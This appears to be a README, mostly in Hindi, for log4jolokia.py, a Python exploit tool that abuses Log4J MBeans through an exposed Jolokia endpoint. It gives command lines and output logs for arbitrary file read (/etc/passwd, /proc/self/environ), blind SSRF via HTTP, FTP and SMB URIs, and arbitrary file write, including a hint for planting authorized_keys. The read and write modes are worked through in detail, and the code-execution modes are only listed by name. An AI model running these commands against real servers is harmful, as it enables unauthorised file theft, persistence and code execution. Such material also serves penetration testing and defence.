
Jolokia के माध्यम से Log4J का शोषण करने के लिए Python3 कार्यान्वयन
Log4J MBeans का लाभ उठाने और Jolokia के माध्यम से उनका शोषण करने के लिए Python3 कार्यान्वयन।
usage: log4jolokia.py [-h] [-u [USER]] [-p [PASSWD]] [--proxy [PROXY]] [-H [HEADER]] {exec_jar,write_file,read_file,exec_script} [{exec_jar,write_file,read_file,exec_script} ...] target [target ...]
positional arguments:
{exec_jar,write_file,read_file,exec_script}
choose mode: exec_jar | write_file | read_file | exec_script
target URL to jolokia (e.g. http://127.0.0.1:8161/console/jolokia)
options:
-h, --help show this help message and exit
-u [USER], --user [USER]
Jolokia username
-p [PASSWD], --passwd [PASSWD]
Jolokia password
--proxy [PROXY] Optional HTTP(S) Proxy (e.g. burp at http://127.0.0.1:8080)
-H [HEADER], --header [HEADER]
Other required custom HTTP headers (e.g. -H "Origin: http://localhost"
-H "Referrer: http://localhost")
नोट: आप कौन सा मोड चुनते हैं उसके आधार पर सहायता कुछ अनुभागों में भिन्न होगी।
प्रोग्राम में निम्नलिखित 4 शोषण मोड हैं:
Log4J की "ConfigLocationUri" विशेषता को संशोधित करके और Jolokia API के माध्यम से "ConfigText" की नई सामग्री को पढ़कर ("getConfigText(String)" फ़ंक्शन का उपयोग करके या "ConfigText" विशेषता पर Jolokia "read" क्रिया करके), एक हमलावर मनमानी फ़ाइलों को पढ़ सकता है।
नोट: इस मामले में हम "getConfigText(String)" रीड वेक्टर का उपयोग करेंगे क्योंकि हम "latin-1" एन्कोडिंग में फ़ाइलों के आउटपुट का बाइट-सटीक प्रतिनिधित्व प्राप्त कर सकते हैं।
नोट 2: इस वेक्टर का उपयोग अन्यथा अगम्य/आंतरिक सर्वरों तक पहुंचने के लिए भी किया जा सकता है:
सहायता - फ़ाइल पढ़ने के विशिष्ट पैरामीटर:
$ python3 log4jolokia.py read_file http://a -h
***TRUNCATED***
-r [READ], --read [READ]
Absolute or relative path of a file to read on target (Use only with mode: read_file)
Example commands:
- Absolute Path:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r /etc/passwd -u admin -p admin -H 'Origin: http://localhost'
- Relative Path:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r ./artemis -u admin -p admin -H 'Origin: http://localhost'
- Specific Protocol:
-- FTP:
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r ftp://test:[email protected]:22/test -u admin -p admin -H 'Origin: http://localhost'
-- SMB (Windows only):
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r file:////127.0.0.1/C/test -u admin -p admin -H 'Origin: http://localhost'
-- HTTP SSRF (Usually no output a.k.a. Blind SSRF):
python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -r 'http://127.0.0.1:80/test?test=test' -u admin -p admin -H 'Origin: http://localhost'
उदाहरण - "/etc/passwd" पढ़ें:
$ python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -r /etc/passwd
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Using mbean org.apache.logging.log4j2:type=21263314
[.] Setting ConfigLocationUri to point to arbitrary location /etc/passwd
[+] Successfully set ConfigLocationUri to "/etc/passwd"
[.] Reading file output from ConfigText
[+] Content of "/etc/passwd":
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
***TRUNCATED***
उदाहरण - "/proc/self/environ" पढ़ें (सामग्री में गैर-मुद्रण योग्य वर्ण हैं (जैसे null-bytes) इसलिए आउटपुट base64 एन्कोडेड होगा):
$ python3 log4jolokia.py read_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -r /proc/self/environ
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Using mbean org.apache.logging.log4j2:type=21263314
[.] Setting ConfigLocationUri to point to arbitrary location /proc/self/environ
[+] Successfully set ConfigLocationUri to "/proc/self/environ"
[.] Reading file output from ConfigText
[.] File "/proc/self/environ" contains non-printable characters, displaying base64 encoding
[+] Base64 content of "/proc/self/environ":
TEVTU09QRU49fCAvdXNyL2Jpbi9sZXNzcGlwZSAlcwBNQUlMPS92YXIvbWFpbC9jdGYAVVNFUj1jdGYATENfVElN***TRUNCATED***
एक दुर्भावनापूर्ण Log4J कॉन्फ़िगरेशन बनाकर और लोड करके, हम "RollingFile -> fileName" (कहाँ लिखना है) और "Pattern" (क्या लिखना है) पैरामीटर के मान का लाभ उठाकर मनमानी सामग्री को मनमाने स्थानों पर लिख सकते हैं। इस मामले में हम XML प्रारूप में दुर्भावनापूर्ण Log4J कॉन्फ़िगरेशन बनाते हैं और "setConfigText(String, String)" फ़ंक्शन का लाभ उठाते हैं।
नोट: जटिल बाइनरी फ़ाइलों को लिखने के लिए, चूंकि XML प्रारूप में विशिष्ट प्रतिबंधित नियंत्रण वर्ण होते हैं, अन्य समर्थित कॉन्फ़िगरेशन प्रारूपों (जैसे Properties) का उपयोग 2-चरणीय लेखन प्रक्रिया में किया गया है।
सहायता - फ़ाइल लिखने के विशिष्ट पैरामीटर:
$ python3 log4jolokia.py write_file http://a -h
***TRUNCATED***
-lf [LOCAL_FILE], --local_file [LOCAL_FILE]
Path to local file to be written on the target (Use only with mode: write_file)
-w [WRITE], --write [WRITE]
Path of file to be written on the target (Use only with mode: write_file)
-P [PERM], --perm [PERM]
Permissions of the file written on the target. Useful for files like "authorized_keys" that require "rw-------". (Default value is "rwxrwx---") (Use only with mode: write_file)
--tmp_dir [TMP_DIR] Location of a writable directory. (Default value is "/tmp")
E.g. Unix == /tmp
Windows == C:/Users/Public
Example command:
python3 log4jolokia.py write_file http://127.0.0.1:8161/console/jolokia/ -lf 00-ff.txt -w /tmp/test_write -u admin -p admin -H 'Origin: http://localhost'
उदाहरण - "/tmp/test" में "test" लिखें:
$ echo test > t.txt
$ python3 log4jolokia.py write_file http://127.0.0.1:8161/console/jolokia/ -u admin -p admin -H 'Origin: http://localhost' -lf t.txt -w /tmp/test --proxy http://127.0.0.1:8080
[.] Looking for "org.apache.logging.log4j2" mbeans in http://127.0.0.1:8161/console/jolokia/list
[+] Found Log4J Mbean org.apache.logging.log4j2:type=21263314
[+] Found Log4J Mbean org.apache.logging.log4j2:type=76ed5528
[.] Reading content from t.txt
[.] Generating Log4J configuration
[+] Generated Log4J XML configuration
[.] Using a double setConfigText in order to flush the buffer
[.] Using setConfigText to load the Log4J XML configuration
[+] Successfully called setConfigText()
[.] Checking that the file "/tmp/test" was written successfully on the target
[+] File "/tmp/test" has been successfully written on the target